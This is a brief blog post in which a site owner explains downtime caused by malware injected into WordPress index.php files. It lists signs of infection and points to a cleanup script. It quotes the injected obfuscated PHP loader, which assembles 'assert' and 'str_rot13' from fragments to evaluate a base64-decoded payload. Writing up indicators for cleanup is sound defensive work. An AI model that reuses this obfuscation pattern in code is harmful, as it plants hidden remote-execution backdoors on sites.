Please excuse the site downtime for HackerAttitude.com
We experienced a malware script that located index.php files and injected some code. It looks like there was an exploit and it allowed a zip file to be uploaded and executed. It’s very well written and is actually rather nice. The outcome isn’t nice, but I can still appreciate the code).
How can I tell if this is the problem with my wordpress site?
Check for a zip file in the root directory. Mine was named npogf.zip. There was a directory with the same name. This is where you can see a folder for a website theme, and some php to change the php.ini settings to run this site.
Strange php files named what seems to be randomly.
Your index.php files will have
$wa = ASSERT_WARNING;
$strings = “as”; $strings .= “se”; $strings .= “rt”; $strings2 = “st”; $strings2 .= “r_r”; $strings2 .= “ot13”; $gbz = “riny(“.$strings2(“base64_decode”); $light = $strings2($gbz.'(” “));’); $strings($light); //###=CACHE END=###
How Do I Fix This?
The author of searchAndDestroy has created a nice search and replace script on github. He explains “to help clean up some lovely injected PHP that I found on one of my web servers. Seems the malware was injected in to my server through an exploit in an highly popular but very old wordpress theme hosted by one of my virtual hosts. The malware spread to other wordpress installs. Fricksauce.”
Hope this helps. My best advice for going through something like this is not to get upset. Learn from the mistake and keep an eye open for similar things in the future. If nothing else you can read over the code and really appreciate the work that has gone into it.